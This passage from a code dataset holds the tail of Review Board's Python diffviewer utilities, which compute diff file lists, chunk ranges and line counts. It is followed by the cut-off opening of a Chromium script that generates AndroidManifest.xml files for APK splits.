(reviewboard.diffviewer.models.filediff.FileDiff, optional):\n A specific file in the diff to return information for.\n\n interdiffset (reviewboard.diffviewer.models.diffset.DiffSet, optional):\n A second diffset used for an interdiff range.\n\n interfilediff (reviewboard.diffviewer.models.filediff.FileDiff,\n optional):\n A second specific file in ``interdiffset`` used to return\n information for. This should be provided if ``filediff`` and\n ``interdiffset`` are both provided. If it's ``None`` in this\n case, then the diff will be shown as reverted for this file.\n\n This may not be provided if ``base_filediff`` is provided.\n\n base_filediff (reviewbaord.diffviewer.models.filediff.FileDiff,\n optional):\n The base FileDiff to use.\n\n This may only be provided if ``filediff`` is provided and\n ``interfilediff`` is not.\n\n filename_patterns (list of unicode, optional):\n A list of filenames or :py:mod:`patterns <fnmatch>` used to\n limit the results. Each of these will be matched against the\n original and modified file of diffs and interdiffs.\n\n base_commit (reviewboard.diffviewer.models.diffcommit.DiffCommit,\n optional):\n An optional base commit. No :py:class:`FileDiffs\n <reviewboard.diffviewer.models.filediff.FileDiff>` from commits\n before that commit will be included in the results.\n\n This argument only applies to :py:class:`DiffSets\n <reviewboard.diffviewer.models.diffset.DiffSet>` with\n :py:class:`DiffCommits <reviewboard.diffviewer.models.diffcommit\n .DiffCommit>`.\n\n tip_commit (reviewboard.diffviewer.models.diffcommit.DiffSet,\n optional):\n An optional tip commit. No :py:class:`FileDiffs\n <reviewboard.diffviewer.models.filediff.FileDiff>` from commits\n after that commit will be included in the results.\n\n This argument only applies to :py:class:`DiffSets\n <reviewboard.diffviewer.models.diffset.DiffSet>` with\n :py:class:`DiffCommits <reviewboard.diffviewer.models.diffcommit\n .DiffCommit>`.\n\n Returns:\n list of dict:\n A list of dictionaries containing information on the files to show\n in the diff, in the order in which they would be shown.\n \"\"\"\n # It is presently not supported to do an interdiff with commit spans. It\n # would require base/tip commits for the interdiffset as well.\n assert not interdiffset or (base_commit is None and tip_commit is None)\n assert base_filediff is None or interfilediff is None\n\n if (diffset.commit_count > 0 and\n base_commit and\n tip_commit and\n base_commit.pk > tip_commit.pk):\n # If the base commit is more recent than the tip commit the interval\n # **must** be empty.\n return []\n\n per_commit_filediffs = None\n requested_base_filediff = base_filediff\n\n if filediff:\n filediffs = [filediff]\n\n if interdiffset:\n log_timer = log_timed(\"Generating diff file info for \"\n \"interdiffset ids %s-%s, filediff %s\" %\n (diffset.id, interdiffset.id, filediff.id),\n request=request)\n else:\n log_timer = log_timed(\"Generating diff file info for \"\n \"diffset id %s, filediff %s\" %\n (diffset.id, filediff.id),\n request=request)\n\n if (diffset.commit_count > 0 and\n ((base_commit and filediff.commit_id <= base_commit.pk) or\n (tip_commit and filediff.commit_id > tip_commit.pk))):\n # The requested FileDiff is outside the requested commit range.\n return []\n else:\n if (diffset.commit_count > 0 and\n (base_commit is not None or tip_commit is not None)):\n # Even if we have base_commit, we need to query for all FileDiffs\n # so that we can do ancestor computations.\n filediffs = per_commit_filediffs = diffset.per_commit_files\n\n if base_commit:\n base_commit_id = base_commit.pk\n else:\n base_commit_id = 0\n\n if tip_commit:\n tip_commit_id = tip_commit.pk\n else:\n tip_commit_id = None\n\n filediffs = [\n f\n for f in filediffs\n if (f.commit_id > base_commit_id and\n (not tip_commit_id or\n f.commit_id <= tip_commit_id))\n ]\n\n filediffs = exclude_ancestor_filediffs(filediffs,\n per_commit_filediffs)\n else:\n filediffs = diffset.cumulative_files\n\n if interdiffset:\n log_timer = log_timed(\"Generating diff file info for \"\n \"interdiffset ids %s-%s\" %\n (diffset.id, interdiffset.id),\n request=request)\n else:\n log_timer = log_timed(\"Generating diff file info for \"\n \"diffset id %s\" % diffset.id,\n request=request)\n\n # Filediffs that were created with leading slashes stripped won't match\n # those created with them present, so we need to compare them without in\n # order for the filenames to match up properly.\n tool = diffset.repository.get_scmtool()\n\n if interdiffset:\n if not filediff:\n if interdiffset.commit_count > 0:\n # Currently, only interdiffing between cumulative diffs is\n # supported.\n interfilediffs = interdiffset.cumulative_files\n else:\n interfilediffs = list(interdiffset.files.all())\n\n elif interfilediff:\n interfilediffs = [interfilediff]\n else:\n interfilediffs = []\n\n filediff_parts = []\n matched_filediffs = get_matched_interdiff_files(\n tool=tool,\n filediffs=filediffs,\n interfilediffs=interfilediffs)\n\n for temp_filediff, temp_interfilediff in matched_filediffs:\n if temp_filediff:\n filediff_parts.append((temp_filediff, temp_interfilediff,\n True))\n elif temp_interfilediff:\n filediff_parts.append((temp_interfilediff, None, False))\n else:\n logging.error(\n 'get_matched_interdiff_files returned an entry with an '\n 'empty filediff and interfilediff for diffset=%r, '\n 'interdiffset=%r, filediffs=%r, interfilediffs=%r',\n diffset, interdiffset, filediffs, interfilediffs)\n\n raise ValueError(\n 'Internal error: get_matched_interdiff_files returned an '\n 'entry with an empty filediff and interfilediff! Please '\n 'report this along with information from the server '\n 'error log.')\n else:\n # We're not working with interdiffs. We can easily create the\n # filediff_parts directly.\n filediff_parts = [\n (temp_filediff, None, False)\n for temp_filediff in filediffs\n ]\n\n # Now that we have all the bits and pieces we care about for the filediffs,\n # we can start building information about each entry on the diff viewer.\n files = []\n\n for parts in filediff_parts:\n filediff, interfilediff, force_interdiff = parts\n\n newfile = filediff.is_new\n\n if interdiffset:\n # First, find out if we want to even process this one.\n # If the diffs are identical, or the patched files are identical,\n # or if the files were deleted in both cases, then we can be\n # absolutely sure that there's nothing interesting to show to\n # the user.\n if get_filediffs_match(filediff, interfilediff):\n continue\n\n source_revision = _('Diff Revision %s') % diffset.revision\n else:\n source_revision = get_revision_str(filediff.source_revision)\n\n if interfilediff:\n dest_revision = _('Diff Revision %s') % interdiffset.revision\n else:\n if force_interdiff:\n dest_revision = (_('Diff Revision %s - File Reverted') %\n interdiffset.revision)\n elif newfile:\n dest_revision = _('New File')\n else:\n dest_revision = _('New Change')\n\n if interfilediff:\n raw_depot_filename = filediff.dest_file\n raw_dest_filename = interfilediff.dest_file\n else:\n raw_depot_filename = filediff.source_file\n raw_dest_filename = filediff.dest_file\n\n depot_filename = tool.normalize_path_for_display(raw_depot_filename)\n dest_filename = tool.normalize_path_for_display(raw_dest_filename)\n\n if filename_patterns:\n if dest_filename == depot_filename:\n filenames = [dest_filename]\n else:\n filenames = [dest_filename, depot_filename]\n\n if not get_filenames_match_patterns(patterns=filename_patterns,\n filenames=filenames):\n continue\n\n base_filediff = None\n\n if filediff.commit_id:\n # If we pre-computed this above (or before) and we have all\n # FileDiffs, this will cost no additional queries.\n #\n # Otherwise this will cost up to\n # ``1 + len(diffset.per_commit_files.count())`` queries.\n ancestors = filediff.get_ancestors(minimal=False,\n filediffs=per_commit_filediffs)\n\n if ancestors:\n if requested_base_filediff:\n assert len(filediffs) == 1\n\n if requested_base_filediff in ancestors:\n base_filediff = requested_base_filediff\n else:\n raise ValueError(\n 'Invalid base_filediff (ID %d) for filediff (ID '\n '%d)'\n % (requested_base_filediff.pk, filediff.pk))\n elif base_commit:\n base_filediff = filediff.get_base_filediff(\n base_commit=base_commit,\n ancestors=ancestors)\n\n f = {\n 'depot_filename': depot_filename,\n 'dest_filename': dest_filename or depot_filename,\n 'revision': source_revision,\n 'dest_revision': dest_revision,\n 'filediff': filediff,\n 'interfilediff': interfilediff,\n 'force_interdiff': force_interdiff,\n 'binary': filediff.binary,\n 'deleted': filediff.deleted,\n 'moved': filediff.moved,\n 'copied': filediff.copied,\n 'moved_or_copied': filediff.moved or filediff.copied,\n 'newfile': newfile,\n 'is_symlink': filediff.extra_data.get('is_symlink', False),\n 'index': len(files),\n 'chunks_loaded': False,\n 'is_new_file': (\n (newfile or\n (base_filediff is not None and\n base_filediff.is_new)) and\n not interfilediff and\n not filediff.parent_diff\n ),\n 'base_filediff': base_filediff,\n }\n\n # When displaying an interdiff, we do not want to display the\n # revision of the base filediff. Instead, we will display the diff\n # revision as computed above.\n if base_filediff and not interdiffset:\n f['revision'] = get_revision_str(base_filediff.source_revision)\n f['depot_filename'] = tool.normalize_path_for_display(\n base_filediff.source_file)\n\n if force_interdiff:\n f['force_interdiff_revision'] = interdiffset.revision\n\n files.append(f)\n\n log_timer.done()\n\n if len(files) == 1:\n return files\n else:\n return get_sorted_filediffs(\n files,\n key=lambda f: f['interfilediff'] or f['filediff'])\n\n\ndef populate_diff_chunks(files, enable_syntax_highlighting=True,\n request=None):\n \"\"\"Populates a list of diff files with chunk data.\n\n This accepts a list of files (generated by get_diff_files) and generates\n diff chunk data for each file in the list. The chunk data is stored in\n the file state.\n \"\"\"\n from reviewboard.diffviewer.chunk_generator import get_diff_chunk_generator\n\n for diff_file in files:\n generator = get_diff_chunk_generator(\n request,\n diff_file['filediff'],\n diff_file['interfilediff'],\n diff_file['force_interdiff'],\n enable_syntax_highlighting,\n base_filediff=diff_file.get('base_filediff'))\n chunks = list(generator.get_chunks())\n\n diff_file.update({\n 'chunks': chunks,\n 'num_chunks': len(chunks),\n 'changed_chunk_indexes': [],\n 'whitespace_only': len(chunks) > 0,\n })\n\n for j, chunk in enumerate(chunks):\n chunk['index'] = j\n\n if chunk['change'] != 'equal':\n diff_file['changed_chunk_indexes'].append(j)\n meta = chunk.get('meta', {})\n\n if not meta.get('whitespace_chunk', False):\n diff_file['whitespace_only'] = False\n\n diff_file.update({\n 'num_changes': len(diff_file['changed_chunk_indexes']),\n 'chunks_loaded': True,\n })\n\n\ndef get_file_from_filediff(context, filediff, interfilediff):\n \"\"\"Return the files that corresponds to the filediff/interfilediff.\n\n This is primarily intended for use with templates. It takes a\n RequestContext for looking up the user and for caching file lists,\n in order to improve performance and reduce lookup times for files that have\n already been fetched.\n\n This function returns either exactly one file or ``None``.\n \"\"\"\n interdiffset = None\n\n key = \"_diff_files_%s_%s\" % (filediff.diffset.id, filediff.id)\n\n if interfilediff:\n key += \"_%s\" % (interfilediff.id)\n interdiffset = interfilediff.diffset\n\n if key in context:\n files = context[key]\n else:\n assert 'user' in context\n\n request = context.get('request', None)\n files = get_diff_files(filediff.diffset, filediff, interdiffset,\n interfilediff=interfilediff,\n request=request)\n populate_diff_chunks(files, get_enable_highlighting(context['user']),\n request=request)\n context[key] = files\n\n if not files:\n return None\n\n assert len(files) == 1\n return files[0]\n\n\ndef get_last_line_number_in_diff(context, filediff, interfilediff):\n \"\"\"Determine the last virtual line number in the filediff/interfilediff.\n\n This returns the virtual line number to be used in expandable diff\n fragments.\n \"\"\"\n f = get_file_from_filediff(context, filediff, interfilediff)\n\n last_chunk = f['chunks'][-1]\n last_line = last_chunk['lines'][-1]\n\n return last_line[0]\n\n\ndef _get_last_header_in_chunks_before_line(chunks, target_line):\n \"\"\"Find the last header in the list of chunks before the target line.\"\"\"\n def find_last_line_numbers(lines):\n \"\"\"Return a tuple of the last line numbers in the given list of lines.\n\n The last line numbers are not always contained in the last element of\n the ``lines`` list. This is the case when dealing with interdiffs that\n have filtered out opcodes.\n\n See :py:func:`get_chunks_in_range` for a description of what is\n contained in each element of ``lines``.\n \"\"\"\n last_left = None\n last_right = None\n\n for line in reversed(lines):\n if not last_right and line[4]:\n last_right = line[4]\n\n if not last_left and line[1]:\n last_left = line[1]\n\n if last_left and last_right:\n break\n\n return last_left, last_right\n\n def find_header(headers, offset, last_line):\n \"\"\"Return the last header that occurs before a line.\n\n The offset parameter is the difference between the virtual number and\n and actual line number in the chunk. This is required because the\n header line numbers are original or patched line numbers, not virtual\n line numbers.\n \"\"\"\n # In the case of interdiffs, it is possible that there will be headers\n # in the chunk that don't belong to it, but were put there due to\n # chunks being merged together. We must therefore ensure that the\n # header we're looking at is actually in the chunk.\n end_line = min(last_line, target_line)\n\n for header in reversed(headers):\n virtual_line = header[0] + offset\n\n if virtual_line < end_line:\n return {\n 'line': virtual_line,\n 'text': header[1]\n }\n\n # The most up-to-date header information\n header = {\n 'left': None,\n 'right': None\n }\n\n for chunk in chunks:\n lines = chunk['lines']\n virtual_first_line = lines[0][0]\n\n if virtual_first_line <= target_line:\n if virtual_first_line == target_line:\n # The given line number is the first line of a new chunk so\n # there can't be any relevant header information here.\n break\n\n last_left, last_right = find_last_line_numbers(lines)\n\n if 'left_headers' in chunk['meta'] and lines[0][1]:\n offset = virtual_first_line - lines[0][1]\n\n left_header = find_header(chunk['meta']['left_headers'],\n offset, last_left + offset)\n\n header['left'] = left_header or header['left']\n\n if 'right_headers' in chunk['meta'] and lines[0][4]:\n offset = virtual_first_line - lines[0][4]\n\n right_header = find_header(chunk['meta']['right_headers'],\n offset, last_right + offset)\n\n header['right'] = right_header or header['right']\n else:\n # We've gone past the given line number.\n break\n\n return header\n\n\ndef get_last_header_before_line(context, filediff, interfilediff, target_line):\n \"\"\"Get the last header that occurs before the given line.\n\n This returns a dictionary of ``left`` header and ``right`` header. Each\n header is either ``None`` or a dictionary with the following fields:\n\n ======== ==============================================================\n Field Description\n ======== ==============================================================\n ``line`` Virtual line number (union of the original and patched files)\n ``text`` The header text\n ======== ==============================================================\n \"\"\"\n f = get_file_from_filediff(context, filediff, interfilediff)\n\n return _get_last_header_in_chunks_before_line(f['chunks'], target_line)\n\n\ndef get_file_chunks_in_range(context, filediff, interfilediff,\n first_line, num_lines):\n \"\"\"Generate the chunks within a range of lines in the specified filediff.\n\n This is primarily intended for use with templates. It takes a\n RequestContext for looking up the user and for caching file lists,\n in order to improve performance and reduce lookup times for files that have\n already been fetched.\n\n See :py:func:`get_chunks_in_range` for information on the returned state\n of the chunks.\n \"\"\"\n f = get_file_from_filediff(context, filediff, interfilediff)\n\n if f:\n return get_chunks_in_range(f['chunks'], first_line, num_lines)\n else:\n return []\n\n\ndef get_chunks_in_range(chunks, first_line, num_lines):\n \"\"\"Generate the chunks within a range of lines of a larger list of chunks.\n\n This takes a list of chunks, computes a subset of those chunks from the\n line ranges provided, and generates a new set of those chunks.\n\n Each returned chunk is a dictionary with the following fields:\n\n ============= ========================================================\n Variable Description\n ============= ========================================================\n ``change`` The change type (\"equal\", \"replace\", \"insert\", \"delete\")\n ``numlines`` The number of lines in the chunk.\n ``lines`` The list of lines in the chunk.\n ``meta`` A dictionary containing metadata on the chunk\n ============= ========================================================\n\n\n Each line in the list of lines is an array with the following data:\n\n ======== =============================================================\n Index Description\n ======== =============================================================\n 0 Virtual line number (union of the original and patched files)\n 1 Real line number in the original file\n 2 HTML markup of the original file\n 3 Changed regions of the original line (for \"replace\" chunks)\n 4 Real line number in the patched file\n 5 HTML markup of the patched file\n 6 Changed regions of the patched line (for \"replace\" chunks)\n 7 True if line consists of only whitespace changes\n ======== =============================================================\n \"\"\"\n for i, chunk in enumerate(chunks):\n lines = chunk['lines']\n\n if lines[-1][0] >= first_line >= lines[0][0]:\n start_index = first_line - lines[0][0]\n\n if first_line + num_lines <= lines[-1][0]:\n last_index = start_index + num_lines\n else:\n last_index = len(lines)\n\n new_chunk = {\n 'index': i,\n 'lines': chunk['lines'][start_index:last_index],\n 'numlines': last_index - start_index,\n 'change': chunk['change'],\n 'meta': chunk.get('meta', {}),\n }\n\n yield new_chunk\n\n first_line += new_chunk['numlines']\n num_lines -= new_chunk['numlines']\n\n assert num_lines >= 0\n if num_lines == 0:\n break\n\n\ndef get_enable_highlighting(user):\n user_syntax_highlighting = True\n\n if user.is_authenticated():\n try:\n profile = user.get_profile()\n user_syntax_highlighting = profile.syntax_highlighting\n except ObjectDoesNotExist:\n pass\n\n siteconfig = SiteConfiguration.objects.get_current()\n return (siteconfig.get('diffviewer_syntax_highlighting') and\n user_syntax_highlighting)\n\n\ndef get_line_changed_regions(oldline, newline):\n \"\"\"Returns regions of changes between two similar lines.\"\"\"\n if oldline is None or newline is None:\n return None, None\n\n # Use the SequenceMatcher directly. It seems to give us better results\n # for this. We should investigate steps to move to the new differ.\n differ = SequenceMatcher(None, oldline, newline)\n\n # This thresholds our results -- we don't want to show inter-line diffs\n # if most of the line has changed, unless those lines are very short.\n\n # FIXME: just a plain, linear threshold is pretty crummy here. Short\n # changes in a short line get lost. I haven't yet thought of a fancy\n # nonlinear test.\n if differ.ratio() < 0.6:\n return None, None\n\n oldchanges = []\n newchanges = []\n back = (0, 0)\n\n for tag, i1, i2, j1, j2 in differ.get_opcodes():\n if tag == 'equal':\n if (i2 - i1 < 3) or (j2 - j1 < 3):\n back = (j2 - j1, i2 - i1)\n\n continue\n\n oldstart, oldend = i1 - back[0], i2\n newstart, newend = j1 - back[1], j2\n\n if oldchanges and oldstart <= oldchanges[-1][1] < oldend:\n oldchanges[-1] = (oldchanges[-1][0], oldend)\n elif not oldline[oldstart:oldend].isspace():\n oldchanges.append((oldstart, oldend))\n\n if newchanges and newstart <= newchanges[-1][1] < newend:\n newchanges[-1] = (newchanges[-1][0], newend)\n elif not newline[newstart:newend].isspace():\n newchanges.append((newstart, newend))\n\n back = (0, 0)\n\n return oldchanges, newchanges\n\n\ndef get_sorted_filediffs(filediffs, key=None):\n \"\"\"Sorts a list of filediffs.\n\n The list of filediffs will be sorted first by their base paths in\n ascending order.\n\n Within a base path, they'll be sorted by base name (minus the extension)\n in ascending order.\n\n If two files have the same base path and base name, we'll sort by the\n extension in descending order. This will make :file:`*.h` sort ahead of\n :file:`*.c`/:file:`*.cpp`, for example.\n\n If the list being passed in is actually not a list of FileDiffs, it\n must provide a callable ``key`` parameter that will return a FileDiff\n for the given entry in the list. This will only be called once per\n item.\n \"\"\"\n def cmp_filediffs(filediff1, filediff2):\n x = make_key(filediff1)\n y = make_key(filediff2)\n\n # Sort based on basepath in ascending order.\n if x[0] != y[0]:\n a = x[0]\n b = y[0]\n else:\n # Sort based on filename in ascending order, then based on\n # the extension in descending order, to make *.h sort ahead of\n # *.c/cpp.\n x_file, x_ext = os.path.splitext(x[1])\n y_file, y_ext = os.path.splitext(y[1])\n\n if x_file == y_file:\n a = y_ext\n b = x_ext\n else:\n a = x_file\n b = y_file\n\n return cmp(a, b)\n\n def make_key(filediff):\n if key:\n filediff = key(filediff)\n\n filename = filediff.dest_file\n i = filename.rfind('/')\n\n if i == -1:\n return '', filename\n else:\n return filename[:i], filename[i + 1:]\n\n return sorted(filediffs, key=cmp_to_key(cmp_filediffs))\n\n\ndef get_displayed_diff_line_ranges(chunks, first_vlinenum, last_vlinenum):\n \"\"\"Return the displayed line ranges based on virtual line numbers.\n\n This takes the virtual line numbers (the index in the side-by-side diff\n lines) and returns the human-readable line numbers, the chunks they're in,\n and mapped virtual line numbers.\n\n A virtual line range may start or end in a chunk not containing displayed\n line numbers (such as an \"original\" range starting/ending in an \"insert\"\n chunk). The resulting displayed line ranges will exclude these chunks.\n\n Args:\n chunks (list of dict):\n The list of chunks for the diff.\n\n first_vlinenum (int):\n The first virtual line number. This uses 1-based indexes.\n\n last_vlinenum (int):\n The last virtual line number. This uses 1-based indexes.\n\n Returns:\n tuple:\n A tuple of displayed line range information, containing 2 items.\n\n Each item will either be a dictionary of information, or ``None``\n if there aren't any displayed lines to show.\n\n The dictionary contains the following keys:\n\n ``display_range``:\n A tuple containing the displayed line range.\n\n ``virtual_range``:\n A tuple containing the virtual line range that ``display_range``\n maps to.\n\n ``chunk_range``:\n A tuple containing the beginning/ending chunks that\n ``display_range`` maps to.\n\n Raises:\n ValueError:\n The range provided was invalid.\n \"\"\"\n if first_vlinenum < 0:\n raise ValueError('first_vlinenum must be >= 0')\n\n if last_vlinenum < first_vlinenum:\n raise ValueError('last_vlinenum must be >= first_vlinenum')\n\n orig_start_linenum = None\n orig_end_linenum = None\n orig_start_chunk = None\n orig_last_valid_chunk = None\n patched_start_linenum = None\n patched_end_linenum = None\n patched_start_chunk = None\n patched_last_valid_chunk = None\n\n for chunk in chunks:\n lines = chunk['lines']\n\n if not lines:\n logging.warning('get_displayed_diff_line_ranges: Encountered '\n 'empty chunk %r',\n chunk)\n continue\n\n first_line = lines[0]\n last_line = lines[-1]\n chunk_first_vlinenum = first_line[0]\n chunk_last_vlinenum = last_line[0]\n\n if first_vlinenum > chunk_last_vlinenum:\n # We're too early. There won't be anything of interest here.\n continue\n\n if last_vlinenum < chunk_first_vlinenum:\n # We're not going to find anything useful at this point, so bail.\n break\n\n change = chunk['change']\n valid_for_orig = (change != 'insert' and first_line[1])\n valid_for_patched = (change != 'delete' and first_line[4])\n\n if valid_for_orig:\n orig_last_valid_chunk = chunk\n\n if not orig_start_chunk:\n orig_start_chunk = chunk\n\n if valid_for_patched:\n patched_last_valid_chunk = chunk\n\n if not patched_start_chunk:\n patched_start_chunk = chunk\n\n if chunk_first_vlinenum <= first_vlinenum <= chunk_last_vlinenum:\n # This chunk contains the first line that can possibly be used for\n # the comment range. We know the start and end virtual line numbers\n # in the range, so we can compute the proper offset.\n offset = first_vlinenum - chunk_first_vlinenum\n\n if valid_for_orig:\n orig_start_linenum = first_line[1] + offset\n orig_start_vlinenum = first_line[0] + offset\n\n if valid_for_patched:\n patched_start_linenum = first_line[4] + offset\n patched_start_vlinenum = first_line[0] + offset\n elif first_vlinenum < chunk_first_vlinenum:\n # One side of the the comment range may not have started in a valid\n # chunk (this would happen if a comment began in an insert or\n # delete chunk). If that happened, we may not have been able to set\n # the beginning of the range in the condition above. Check for this\n # and try setting it now.\n if orig_start_linenum is None and valid_for_orig:\n orig_start_linenum = first_line[1]\n orig_start_vlinenum = first_line[0]\n\n if patched_start_linenum is None and valid_for_patched:\n patched_start_linenum = first_line[4]\n patched_start_vlinenum = first_line[0]\n\n # Figure out the end ranges, now that we know the valid ending chunks of\n # each. We're going to try to get the line within the chunk that represents\n # the end, if within the chunk, capping it to the last line in the chunk.\n #\n # If a particular range did not have a valid chunk anywhere in that range,\n # we're going to invalidate the entire range.\n if orig_last_valid_chunk:\n lines = orig_last_valid_chunk['lines']\n first_line = lines[0]\n last_line = lines[-1]\n offset = last_vlinenum - first_line[0]\n\n orig_end_linenum = min(last_line[1], first_line[1] + offset)\n orig_end_vlinenum = min(last_line[0], first_line[0] + offset)\n\n assert orig_end_linenum >= orig_start_linenum\n assert orig_end_vlinenum >= orig_start_vlinenum\n\n orig_range_info = {\n 'display_range': (orig_start_linenum, orig_end_linenum),\n 'virtual_range': (orig_start_vlinenum, orig_end_vlinenum),\n 'chunk_range': (orig_start_chunk, orig_last_valid_chunk),\n }\n else:\n orig_range_info = None\n\n if patched_last_valid_chunk:\n lines = patched_last_valid_chunk['lines']\n first_line = lines[0]\n last_line = lines[-1]\n offset = last_vlinenum - first_line[0]\n\n patched_end_linenum = min(last_line[4], first_line[4] + offset)\n patched_end_vlinenum = min(last_line[0], first_line[0] + offset)\n\n assert patched_end_linenum >= patched_start_linenum\n assert patched_end_vlinenum >= patched_start_vlinenum\n\n patched_range_info = {\n 'display_range': (patched_start_linenum, patched_end_linenum),\n 'virtual_range': (patched_start_vlinenum, patched_end_vlinenum),\n 'chunk_range': (patched_start_chunk, patched_last_valid_chunk),\n }\n else:\n patched_range_info = None\n\n return orig_range_info, patched_range_info\n\n\ndef get_diff_data_chunks_info(diff):\n \"\"\"Return information on each chunk in a diff.\n\n This will scan through a unified diff file, looking for each chunk in the\n diff and returning information on their ranges and lines of context. This\n can be used to generate statistics on diffs and help map changed regions\n in diffs to lines of source files.\n\n Args:\n diff (bytes):\n The diff data to scan.\n\n Returns:\n list of dict:\n A list of chunk information dictionaries. Each entry has an ``orig``\n and ``modified` dictionary containing the following keys:\n\n ``chunk_start`` (``int``):\n The starting line number of the chunk shown in the diff, including\n any lines of context. This is 0-based.\n\n ``chunk_len`` (``int``):\n The length of the chunk shown in the diff, including any lines of\n context.\n\n ``changes_start`` (``int``):\n The starting line number of a range of changes shown in a chunk in\n the diff.\n This is after any lines of context and is 0-based.\n\n ``changes_len`` (``int``):\n The length of the changes shown in a chunk in the diff, excluding\n any lines of context.\n\n ``pre_lines_of_context`` (``int``):\n The number of lines of context before any changes in a chunk. If\n the chunk doesn't have any changes, this will contain all lines of\n context otherwise shown around changes in the other region in this\n entry.\n\n ``post_lines_of_context`` (``int``):\n The number of lines of context after any changes in a chunk. If\n the chunk doesn't have any changes, this will be 0.\n \"\"\"\n def _finalize_result():\n if not cur_result:\n return\n\n for result_dict, unchanged_lines in ((cur_result_orig,\n orig_unchanged_lines),\n (cur_result_modified,\n modified_unchanged_lines)):\n result_dict['changes_len'] -= unchanged_lines\n\n if result_dict['changes_len'] == 0:\n assert result_dict['pre_lines_of_context'] == 0\n result_dict['pre_lines_of_context'] = unchanged_lines\n else:\n result_dict['post_lines_of_context'] = unchanged_lines\n\n process_orig_changes = False\n process_modified_changes = False\n\n results = []\n cur_result = None\n cur_result_orig = None\n cur_result_modified = None\n\n orig_unchanged_lines = 0\n modified_unchanged_lines = 0\n\n # Look through the chunks of the diff, trying to find the amount\n # of context shown at the beginning of each chunk. Though this\n # will usually be 3 lines, it may be fewer or more, depending\n # on file length and diff generation settings.\n for i, line in enumerate(split_line_endings(diff.strip())):\n if line.startswith(b'-'):\n if process_orig_changes:\n # We've found the first change in the original side of the\n # chunk. We now know how many lines of context we have here.\n #\n # We reduce the indexes by 1 because the chunk ranges\n # in diffs start at 1, and we want a 0-based index.\n cur_result_orig['pre_lines_of_context'] = orig_unchanged_lines\n cur_result_orig['changes_start'] += orig_unchanged_lines\n cur_result_orig['changes_len'] -= orig_unchanged_lines\n process_orig_changes = False\n\n orig_unchanged_lines = 0\n elif line.startswith(b'+'):\n if process_modified_changes:\n # We've found the first change in the modified side of the\n # chunk. We now know how many lines of context we have here.\n #\n # We reduce the indexes by 1 because the chunk ranges\n # in diffs start at 1, and we want a 0-based index.\n cur_result_modified['pre_lines_of_context'] = \\\n modified_unchanged_lines\n cur_result_modified['changes_start'] += \\\n modified_unchanged_lines\n cur_result_modified['changes_len'] -= modified_unchanged_lines\n process_modified_changes = False\n\n modified_unchanged_lines = 0\n elif line.startswith(b' '):\n # We might be before a group of changes, inside a group of changes,\n # or after a group of changes. Either way, we want to track these\n # values.\n orig_unchanged_lines += 1\n modified_unchanged_lines += 1\n else:\n # This was not a change within a chunk, or we weren't processing,\n # so check to see if this is a chunk header instead.\n m = CHUNK_RANGE_RE.match(line)\n\n if m:\n # It is a chunk header. Start by updating the previous range\n # to factor in the lines of trailing context.\n _finalize_result()\n\n # Next, reset the state for the next range, and pull the line\n # numbers and lengths from the header. We'll also normalize\n # the starting locations to be 0-based.\n orig_start = int(m.group('orig_start')) - 1\n orig_len = int(m.group('orig_len') or '1')\n modified_start = int(m.group('modified_start')) - 1\n modified_len = int(m.group('modified_len') or '1')\n\n cur_result_orig = {\n 'pre_lines_of_context': 0,\n 'post_lines_of_context': 0,\n 'chunk_start': orig_start,\n 'chunk_len': orig_len,\n 'changes_start': orig_start,\n 'changes_len': orig_len,\n }\n cur_result_modified = {\n 'pre_lines_of_context': 0,\n 'post_lines_of_context': 0,\n 'chunk_start': modified_start,\n 'chunk_len': modified_len,\n 'changes_start': modified_start,\n 'changes_len': modified_len,\n }\n cur_result = {\n 'orig': cur_result_orig,\n 'modified': cur_result_modified,\n }\n results.append(cur_result)\n\n process_orig_changes = True\n process_modified_changes = True\n orig_unchanged_lines = 0\n modified_unchanged_lines = 0\n else:\n logging.warning('Unexpected content on line %d of diff: \"%s\"',\n i, line)\n\n # We need to adjust the last range, if we're still processing\n # trailing context.\n _finalize_result()\n\n return results\n\n\ndef check_diff_size(diff_file, parent_diff_file=None):\n \"\"\"Check the size of the given diffs against the maximum allowed size.\n\n If either of the provided diffs are too large, an exception will be raised.\n\n Args:\n diff_file (django.core.files.uploadedfile.UploadedFile):\n The diff file.\n\n parent_diff_file (django.core.files.uploadedfile.UploadedFile,\n optional):\n The parent diff file, if any.\n\n Raises:\n reviewboard.diffviewer.errors.DiffTooBigError:\n The supplied files are too big.\n \"\"\"\n siteconfig = SiteConfiguration.objects.get_current()\n max_diff_size = siteconfig.get('diffviewer_max_diff_size')\n\n if max_diff_size > 0:\n if diff_file.size > max_diff_size:\n raise DiffTooBigError(\n _('The supplied diff file is too large.'),\n max_diff_size=max_diff_size)\n\n if parent_diff_file and parent_diff_file.size > max_diff_size:\n raise DiffTooBigError(\n _('The supplied parent diff file is too large.'),\n max_diff_size=max_diff_size)\n\n\ndef get_total_line_counts(files_qs):\n \"\"\"Return the total line counts of all given FileDiffs.\n\n Args:\n files_qs (django.db.models.query.QuerySet):\n The queryset descripting the :py:class:`FileDiffs\n <reviewboard.diffviewer.models.filediff.FileDiff>`.\n\n Returns:\n dict:\n A dictionary with the following keys:\n\n * ``raw_insert_count``\n * ``raw_delete_count``\n * ``insert_count``\n * ``delete_count``\n * ``replace_count``\n * ``equal_count``\n * ``total_line_count``\n\n Each entry maps to the sum of that line count type for all\n :py:class:`FileDiffs\n <reviewboard.diffviewer.models.filediff.FileDiff>`.\n \"\"\"\n counts = {\n 'raw_insert_count': 0,\n 'raw_delete_count': 0,\n 'insert_count': 0,\n 'delete_count': 0,\n 'replace_count': None,\n 'equal_count': None,\n 'total_line_count': None,\n }\n\n for filediff in files_qs:\n for key, value in six.iteritems(filediff.get_line_counts()):\n if value is not None:\n if counts[key] is None:\n counts[key] = value\n else:\n counts[key] += value\n\n return counts\n"} {"ext": "py", "sha": "1a312eda6ac15637aaa3e935fa431e5e20ceeeaf", "content": "#!/usr/bin/env python\n#\n# Copyright 2015 The Chromium Authors. All rights reserved.\n# Use of this source code is governed by a BSD-style license that can be\n# found in the LICENSE file.\n\"\"\"Creates an AndroidManifest.xml for an APK split.\n\nGiven the manifest file for the main APK, generates an AndroidManifest.xml with\nthe value required for a Split APK (package, versionCode, etc).\n\"\"\"\n\nimport lxml.etree\nimport optparse\n\nfrom util import build_utils\n\nMANIFEST_TEMPLATE = \"\"\"<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<manifest\n xmlns:android=\"http://schemas.android.com/apk/res/android\"\n package=\"%(package)s\"\n split=\"%(split)s\">\n <uses-sdk android:minSdkVersion=\"21\" />\n <application 